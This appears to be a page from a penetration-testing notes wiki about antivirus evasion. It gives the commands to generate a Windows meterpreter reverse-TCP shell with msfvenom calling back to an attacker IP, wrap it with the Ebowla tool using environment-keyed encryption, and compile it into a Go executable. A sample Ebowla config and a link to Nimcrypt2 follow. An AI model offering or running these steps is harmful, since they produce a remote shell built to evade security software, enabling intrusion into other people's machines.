Tools

Ebowla

We encode a payload that gets dynamically decoded in the run time on the box. For example we use environment variables for encoding like username, computer name etc.

https://github.com/Genetic-Malware/Ebowla

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.133 LPORT=9001 -f exe > shell.exe
./ebowla.py shell.exe genetic.config
./build_x64_go.sh output/go_symmetric_shell.exe.go morph3-ebowla.exe

An example genetic.config,

...
     output_type = GO 
...
        [[ENV_VAR]]
        username = 'morph3'
        computername = ''
        homepath = ''
        homedrive = ''
        Number_of_processors = ''
        processor_identifier = ''
        processor_revision = ''
        userdomain = 'acme'
        systemdrive = ''
        userprofile = ''
        path = ''
        temp = ''

Nimcrypt2

https://github.com/icyguider/Nimcrypt2

https://twitter.com/binitamshah/status/1594698510762332160?s=46&t=LDLfp0MIS1Dsg420TRpKXA

PreviousAMSI Bypass NextEsoteric

Last updated 2 years ago